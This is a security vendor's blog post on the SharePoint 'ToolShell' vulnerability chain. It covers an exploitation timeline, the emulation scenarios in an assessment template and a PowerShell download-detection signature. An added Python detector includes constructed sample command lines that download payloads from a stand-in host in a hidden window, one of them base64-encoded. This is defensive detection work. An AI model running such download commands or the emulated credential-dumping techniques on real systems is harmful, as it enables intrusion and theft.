On July 8, 2025, vulnerabilities CVE-2025-49704 (Remote Code Execution) and CVE-2025-49706 (Network Spoofing), affecting on-premises Microsoft SharePoint servers, were officially reported. On the same day, Microsoft addressed both vulnerabilities as part of its July 2025 Patch Tuesday release.
Initially disclosed by Viettel Cyber Security during Pwn2Own Berlin 2025, a computer hacking contest where researchers are challenged to exploit widely used software, these vulnerabilities were employed as part of a chained attack, publicly known as “ToolShell”, which enables unauthenticated access and arbitrary command execution on vulnerable SharePoint instances.
On July 18, Eye Security reported the large-scale exploitation of the ToolShell chain in the wild. According to the report, the initial wave occurred on July 17, presumably as part of a testing activity. By the following day, the first successful exploitation activity was identified with the objective of compromising on-premises SharePoint environments worldwide.
On July 19, two additional vulnerabilities were discovered: CVE-2025-53770, an unsafe deserialization flaw that leads to Remote Code Execution (RCE), and CVE-2025-53771, a spoofing/path traversal vulnerability that enables unauthenticated access. Notably, CVE-2025-53770 serves as a patch bypass for CVE-2025-49704, while CVE-2025-53771 bypasses CVE-2025-49706. These are evolved variants of the original ToolShell vulnerabilities, indicating that the initial vendor-provided remediation was incomplete.
On July 20, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert detailing the active exploitation of the ToolShell chain. The alert noted that in addition to typical webshell payloads such as .aspx and .exe, adversaries had also been observed deploying .dll payloads.
On July 22, Microsoft confirmed that two China-based adversaries, Linen Typhoon and Violet Typhoon, had exploited these vulnerabilities to target internet-facing SharePoint servers. More recently, Microsoft identified that a third Chinese adversary, Storm-2603, leveraged the same vulnerability chain to deploy Warlock ransomware, resulting in file encryption on compromised systems.
AttackIQ has released a new assessment template that compiles the Tactics, Techniques, and Procedures (TTPs) associated with the exploitation of CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771, which affect on-premises Microsoft SharePoint servers. The template helps customers validate their security controls and their ability to defend against this critical threat.
Validating security program performance against these behaviors is vital in reducing risk. By employing this assessment template within the AttackIQ Security Optimization Platform, security teams will be able to:
This emulation compiles the Tactics, Techniques, and Procedures (TTPs) associated with the exploitation of the CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 vulnerabilities, which affect on-premises Microsoft SharePoint servers.
It is based on reports published by Eye Security on July 19, 2025, CISA on July 20, 2025, Trend Micro on July 22, 2025, and Microsoft on July 22, 2025.
1. Initial Access: Consists of scenarios designed to imitate the network communication associated with the reconnaissance and exploitation of the SharePoint vulnerabilities, in order to validate Web Application Firewalls (WAFs).
2. Execution: Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.
Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.
3. Persistence: Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task using the schtasks utility.
4. Credential Access: Consists of techniques used by adversaries to harvest credentials available on the compromised system.
OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.
5. Discovery: Consists of techniques that adversaries use to discover information related to the compromised environment.
System Owner/User Discovery (T1033): This scenario executes the whoami command to retrieve the username of the running user account.
6. Lateral Movement: Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.
Windows Management Instrumentation (T1047): This scenario emulates the use of the Impacket utility to execute the WMIEXEC class, facilitating lateral movement via the WMI protocol.
7. Associated Payloads: Consists of malicious components observed in conjunction with the exploitation of the SharePoint vulnerabilities.
Ingress Tool Transfer (T1105): This technique is covered by two separate scenarios, one that downloads the payload to memory and one that saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.
In addition to the released emulation, AttackIQ recommends the following scenario to extend the emulation of the capabilities associated with the exploitation of these vulnerabilities:
Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PsExec.
Given the breadth of TTPs associated with the exploitation of these vulnerabilities, determining which to prioritize for prevention and detection assessment can be challenging. AttackIQ recommends initially focusing on the following techniques before expanding coverage to the remaining techniques.
CISA has provided a significant number of recommendations on the best ways to defend against these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations and adapting them to your environment first, to determine whether you have already been impacted, before reviewing the assessment results.
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
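The following Python example, added here and not part of AttackIQ's template or the original post, implements the signature above as a matcher and runs it over a handful of constructed process-creation events (the field names, hostnames under example.invalid and command lines are all made up for illustration). It goes one step beyond the signature as written: because the PowerShell scenario in this template uses -EncodedCommand, a command line can carry the IWR/DownloadData strings only inside a base64 blob, so the matcher decodes that blob (UTF-16LE, as PowerShell expects) before applying the CONTAINS checks.

```python
import base64
import re
from typing import List, Optional

# Process names from the signature's "Process Name == (Cmd.exe OR Powershell.exe)" clause.
DOWNLOADER_PROCESSES = {"cmd.exe", "powershell.exe"}
# "(IWR OR Invoke-WebRequest)" -- either term satisfies this group.
DOWNLOAD_CMDLETS = ("iwr", "invoke-webrequest")
# "AND DownloadData AND Hidden" -- every term here must be present.
REQUIRED_TERMS = ("downloaddata", "hidden")

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive) for the base64 script.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand encoding: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none (or it is not valid base64)."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def matches_download_signature(process: str, cmdline: str) -> bool:
    """Apply the signature: process filter, then (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden.

    Matching is case-insensitive, and any -EncodedCommand payload is decoded and searched
    alongside the visible command line so that encoding alone does not evade the rule.
    """
    if process.lower() not in DOWNLOADER_PROCESSES:
        return False
    text = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded.lower()
    return any(c in text for c in DOWNLOAD_CMDLETS) and all(t in text for t in REQUIRED_TERMS)


def scan_events(events: List[dict]) -> List[dict]:
    """Return the events that trigger the signature (hypothetical 'process'/'cmdline' field names)."""
    return [e for e in events if matches_download_signature(e["process"], e["cmdline"])]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # 1. Hidden window + IWR, but no DownloadData: the AND clause is not satisfied.
    {"process": "powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -Command "(IWR http://example.invalid/w.aspx -UseBasicParsing).Content"'},
    # 2. All three terms visible on the command line, launched through cmd.exe: match.
    {"process": "cmd.exe",
     "cmdline": 'cmd.exe /c powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/l.txt -UseBasicParsing; (New-Object Net.WebClient).DownloadData(\'http://example.invalid/p.bin\')"'},
    # 3. Same content, but IWR/DownloadData live only inside -enc: matches only after decoding.
    {"process": "powershell.exe",
     "cmdline": "powershell.exe -w Hidden -enc " + encode_powershell(
         "IWR http://example.invalid/l.txt -UseBasicParsing; (New-Object Net.WebClient).DownloadData('http://example.invalid/p.bin')")},
    # 4. Identical command line under a process the signature does not cover: no match.
    {"process": "notepad.exe",
     "cmdline": 'notepad.exe -WindowStyle Hidden Invoke-WebRequest DownloadData'},
    # 5. Ordinary, visible web request: no match.
    {"process": "powershell.exe",
     "cmdline": 'powershell.exe -Command "Invoke-WebRequest https://example.invalid/update.json"'},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("ALERT:", hit["process"], "->", hit["cmdline"][:80])
```

Events 2 and 3 trigger the rule; event 3 would be missed by a literal CONTAINS match on the raw command line, which is the practical reason to decode -EncodedCommand before applying string signatures of this kind. In a real deployment the same logic would be expressed as a SIEM or EDR query over Sysmon Event ID 1 / Security 4688 command-line fields rather than as a Python loop.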
MITRE ATT&CK has the following mitigation recommendations.
In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against this critical threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
Francis Guibernau is an Adversary Research Engineer and member of the Adversary Research Team (ART) at AttackIQ. Francis conducts in-depth threat research and analysis to design and create highly sophisticated and realistic adversary emulations.
He also coordinates the Cyber Threat Intelligence (CTI) project which focuses on the research, analysis, tracking and documentation of adversaries, malware families and cybersecurity incidents. Francis has extensive experience in adversary intelligence, encompassing both Nation-State and eCrime threats, as well as in vulnerability assessment and management, having previously worked at Deloitte and BNP Paribas.
Andrew Costis (“AC”) is Chapter Lead of the Adversary Research Team at AttackIQ. He has over 22 years of professional industry experience, and previously worked in the Threat Analysis Unit (TAU) team at VMware Carbon Black, and LogRhythm Labs, performing security research, reverse engineering malware, tracking, and discovering new campaigns and threats. Andrew has delivered various talks at Def Con Adversary Village, Black Hat, B-Sides, CyberRisk Alliance, SecurityWeekly, ITPro, BrightTalk, SC Magazine and others.